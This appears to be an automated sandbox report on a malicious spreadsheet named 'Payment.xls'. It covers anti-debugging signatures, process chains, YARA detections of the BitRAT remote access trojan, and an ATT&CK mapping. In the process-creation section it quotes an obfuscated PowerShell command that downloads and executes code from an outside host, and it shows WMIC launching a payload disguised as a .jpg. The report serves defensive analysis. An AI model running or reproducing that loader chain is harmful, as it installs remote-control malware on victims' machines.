      Source: ModuleAnalysisCache.3.dr Binary or memory string: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapterRdma
      Source: ModuleAnalysisCache.3.dr Binary or memory string: (Set-VMNetworkAdapterRoutingDomainMapping
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Remove-VMNetworkAdapterTeamMapping
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterAcl
      Source: ModuleAnalysisCache.3.dr Binary or memory string: )Set-VMNetworkAdapterFailoverConfiguration
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Rename-VMNetworkAdapter
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterVlan
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapterIsolation
      Source: ModuleAnalysisCache.3.dr Binary or memory string: (Add-VmNetworkAdapterRoutingDomainMapping
      Source: ModuleAnalysisCache.3.dr Binary or memory string: "Remove-VMNetworkAdapterTeamMapping
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Remove-VMNetworkAdapterAcl
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapter
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Add-VMScsiController
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VmNetworkAdapterIsolation
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VmNetworkAdapterRoutingDomainMapping
      Source: WMIC.exe, 0000001A.00000002.345562483.0000000003920000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMScsiController
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterRdma
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapterRoutingDomainMapping
      Source: WMIC.exe, 0000001A.00000002.345562483.0000000003920000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapterVlan
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VmNetworkAdapterIsolation
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Disconnect-VMNetworkAdapter
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapter
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterRoutingDomainMapping
      Source: ModuleAnalysisCache.3.dr Binary or memory string: "Remove-VMNetworkAdapterExtendedAcl
      Source: ModuleAnalysisCache.3.dr Binary or memory string: KC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
      Source: ModuleAnalysisCache.3.dr Binary or memory string: +Remove-VMNetworkAdapterRoutingDomainMapping
      Source: ModuleAnalysisCache.3.dr Binary or memory string: (Add-VMNetworkAdapterRoutingDomainMapping
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Add-VMNetworkAdapterRoutingDomainMapping
      Source: ModuleAnalysisCache.3.dr Binary or memory string: (Get-VMNetworkAdapterRoutingDomainMapping
      Source: ModuleAnalysisCache.3.dr Binary or memory string: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Add-VMNetworkAdapterAcl
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapterFailoverConfiguration
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Add-VmNetworkAdapterRoutingDomainMapping
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Remove-VMScsiController
      Source: ModuleAnalysisCache.3.dr Binary or memory string: OC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterFailoverConfiguration
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Remove-VMNetworkAdapter
      Source: ModuleAnalysisCache.3.dr Binary or memory string: (Set-VmNetworkAdapterRoutingDomainMapping
      Source: WMIC.exe, 0000001A.00000002.345562483.0000000003920000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Remove-VMNetworkAdapterRoutingDomainMapping
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterExtendedAcl
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

      Anti Debugging:

      Contains functionality to hide a thread from the debugger
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_00478772 NtSetInformationThread ?,00000011,00000000,00000000,?,?,00000000,00000000
      Hides threads from debuggers
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Thread information set: HideFromDebugger
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_0058E501 IsDebuggerPresent,OutputDebugStringW,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_007D5210 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_004252D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_00424F75 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_00424FD2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_00424FE7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_00424FFB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_022100C7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02211133 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210C36 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210B3A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210A3C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210704 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210B06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210A08 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210D17 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_0221096C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210B6E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210A70 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210C4B mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_0221115B mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_022109A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210BA2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210EA2 mov ebx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210EA2 mov edx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210AA4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210698 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210CD5 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210AD5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_022109D4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210BD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_0069B53C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_004AABEB GetProcessHeap,HeapFree,
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Process token adjusted: Debug
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_006814DA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_0068B781 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

      HIPS / PFW / Operating System Protection Evasion:

      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\Test3.jpg protection: execute and read and write
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C COPy /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C WmIC PRocESs CAlL cREAtE %TEMP%\Test3.jpg
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESBD2F.tmp' 'c:\Users\user\AppData\Local\Temp\nwaha3c5\CSCEA75873C5D80459DA0D513336FABE338.TMP'
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe WmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpg
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg
      Source: Yara match | File source: Scanned_25526662-Payment.xls, type: SAMPLE
      Source: Test3.jpg, 0000001D.00000002.504032737.0000000001160000.00000002.00000001.sdmp | Binary or memory string: Program Manager
      Source: Test3.jpg, 0000001D.00000002.504032737.0000000001160000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
      Source: Test3.jpg, 0000001D.00000002.504032737.0000000001160000.00000002.00000001.sdmp | Binary or memory string: Progman
      Source: Test3.jpg, 0000001D.00000002.504032737.0000000001160000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
      Source: Test3.jpg, 0000001D.00000003.488792166.00000000035B4000.00000004.00000001.sdmp | Binary or memory string: Program Manager]
      Source: Test3.jpg, 0000001D.00000003.470470282.00000000035B4000.00000004.00000001.sdmp | Binary or memory string: Program ManagerY
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 29_2_0040EA7D cpuid
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: GetLocaleInfoW,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: ___crtGetLocaleInfoEx,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: GetLocaleInfoW,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: EnumSystemLocalesW,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: EnumSystemLocalesW,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: EnumSystemLocalesW,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: EnumSystemLocalesW,
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 29_2_004139F1 __EH_prolog,GetSystemTimes,GetCurrentProcess,GetProcessTimes,GetTickCount64,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information:

      Yara detected BitRAT
      Source: Yara match | File source: Process Memory Space: Test3.jpg PID: 3180, type: MEMORY

      Remote Access Functionality:

      Yara detected BitRAT
      Source: Yara match | File source: Process Memory Space: Test3.jpg PID: 3180, type: MEMORY

      Mitre Att&ck Matrix

      (One row per matrix line; the trailing digits on a technique name are the signature counts the report attaches to that technique. An empty cell means the column has no further entry.)

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | Windows Management Instrumentation21 | DLL Side-Loading1 | DLL Side-Loading1 | Disable or Modify Tools1 | Input Capture1 | System Time Discovery1 | Remote Services | Archive Collected Data11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Default Accounts | Scripting11 | Boot or Logon Initialization Scripts | Process Injection112 | Deobfuscate/Decode Files or Information1 | LSASS Memory | File and Directory Discovery2 | Remote Desktop Protocol | Input Capture1 | Exfiltration Over Bluetooth | Encrypted Channel2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | Native API1 | Logon Script (Windows) | Logon Script (Windows) | Scripting11 | Security Account Manager | System Information Discovery36 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Standard Port1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | Exploitation for Client Execution13 | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information3 | NTDS | Query Registry1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol2 | SIM Card Swap |  | Carrier Billing Fraud
      Cloud Accounts | PowerShell2 | Network Logon Script | Network Logon Script | Software Packing2 | LSA Secrets | Security Software Discovery331 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol12 | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
      Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading1 | Cached Domain Credentials | Virtualization/Sandbox Evasion14 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
      External Remote Services | Scheduled Task | Startup Items | Startup Items | Masquerading11 | DCSync | Process Discovery3 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion14 | Proc Filesystem | Application Window Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection112 | /etc/passwd and /etc/shadow | Remote System Discovery1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction

      Behavior Graph

      Behavior Graph ID: 337288 | Sample: Scanned_25526662-Payment.xls | Start date: 08/01/2021 | Architecture: WINDOWS | Score: 100

